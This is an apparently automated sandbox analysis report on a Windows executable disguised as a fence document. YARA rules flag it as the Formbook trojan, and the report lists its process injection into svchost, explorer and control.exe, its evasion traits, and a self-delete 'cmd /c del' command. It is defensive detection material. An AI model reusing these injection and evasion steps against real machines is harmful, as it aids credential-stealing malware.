Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.3822306235.000000000EBD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 2024 Lusail Fence-WITH STICKER-2-003.exe PID: 7572, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 7624, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 7668, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@279/4@12/8

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DEA2D5 GetLastError,FormatMessageW,

0_2_00DEA2D5

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DD8713 AdjustTokenPrivileges,CloseHandle,		0_2_00DD8713
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DD8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00DD8CC3

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DEB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00DEB59E

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DFF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00DFF121

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DF86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00DF86D0

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00D84FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00D84FE9

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

File created: C:\Users\user~1\AppData\Local\Temp\autBE59.tmp

Source: 2024 Lusail Fence-WITH STICKER-2-003.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: 2024 Lusail Fence-WITH STICKER-2-003.exe

ReversingLabs: Detection: 66%

Source: unknown	Process created: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe "C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe"
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Switches to a custom stack to bypass stack traces

Source: 2024 Lusail Fence-WITH STICKER-2-003.exe

Static file information: File size 1128960 > 1048576

Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 2024 Lusail Fence-WITH STICKER-2-003.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: 2024 Lusail Fence-WITH STICKER-2-003.exe, 00000000.00000003.1364522933.0000000004330000.00000004.00001000.00020000.00000000.sdmp, 2024 Lusail Fence-WITH STICKER-2-003.exe, 00000000.00000003.1364960742.0000000004190000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1367439868.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1418417449.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365074294.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1418417449.000000000379E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.1417912394.00000000040DF000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000003.1421634030.000000000428E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.3809219017.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.3809219017.0000000004440000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: svchost.exe, 00000002.00000002.1421885030.0000000005310000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1417263305.000000000301B000.00000004.00000020.00020000.00000000.sdmp, control.exe, control.exe, 00000004.00000002.3808912482.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 2024 Lusail Fence-WITH STICKER-2-003.exe, 00000000.00000003.1364522933.0000000004330000.00000004.00001000.00020000.00000000.sdmp, 2024 Lusail Fence-WITH STICKER-2-003.exe, 00000000.00000003.1364960742.0000000004190000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1367439868.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1418417449.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365074294.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1418417449.000000000379E000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000004.00000003.1417912394.00000000040DF000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000003.1421634030.000000000428E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.3809219017.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.3809219017.0000000004440000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: control.pdbUGP source: svchost.exe, 00000002.00000002.1421885030.0000000005310000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1417263305.000000000301B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.3808912482.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3823187633.0000000010F0F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.3808555640.000000000070B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.3810060905.000000000498F000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3823187633.0000000010F0F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.3808555640.000000000070B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.3810060905.000000000498F000.00000004.10000000.00040000.00000000.sdmp

Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DFC304 LoadLibraryA,GetProcAddress,

0_2_00DFC304

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DA8B85 push ecx; ret	0_2_00DA8B98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041793E push eax; ret	2_2_00417942
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040A99E pushfd ; ret	2_2_0040A99F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E343 push eax; retf	2_2_0040E344
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041DB1D push edx; ret	2_2_0041DC78
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416CD6 push eax; ret	2_2_00416CD9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4F2 push eax; ret	2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4FB push eax; ret	2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4A5 push eax; ret	2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E552 push dword ptr [B4E3C852h]; ret	2_2_0041E577
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D55C push eax; ret	2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416627 push 00000000h; retf	2_2_00416629
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041B714 push ecx; ret	2_2_0041B715
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360225F pushad ; ret	2_2_036027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036027FA pushad ; ret	2_2_036027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx	2_2_036309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360283D push eax; iretd	2_2_03602858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360135F push eax; iretd	2_2_03601369
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EB1E push esp; retn 0000h	2_2_03B5EB1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EB02 push esp; retn 0000h	2_2_03B5EB03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E9B5 push esp; retn 0000h	2_2_03B5EAE7
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBBB9B5 push esp; retn 0000h	3_2_0EBBBAE7
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBBBB1E push esp; retn 0000h	3_2_0EBBBB1F
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBBBB02 push esp; retn 0000h	3_2_0EBBBB03
Source: C:\Windows\explorer.exe	Code function: 3_2_0F43BB02 push esp; retn 0000h	3_2_0F43BB03
Source: C:\Windows\explorer.exe	Code function: 3_2_0F43BB1E push esp; retn 0000h	3_2_0F43BB1F
Source: C:\Windows\explorer.exe	Code function: 3_2_0F43B9B5 push esp; retn 0000h	3_2_0F43BAE7
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_00C9486D push ecx; ret	4_2_00C94880
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044709AD push ecx; mov dword ptr [esp], ecx	4_2_044709B6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BE0A1 push eax; retf	4_2_001BE0A2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BE0C8 push esi; retf	4_2_001BE0CC

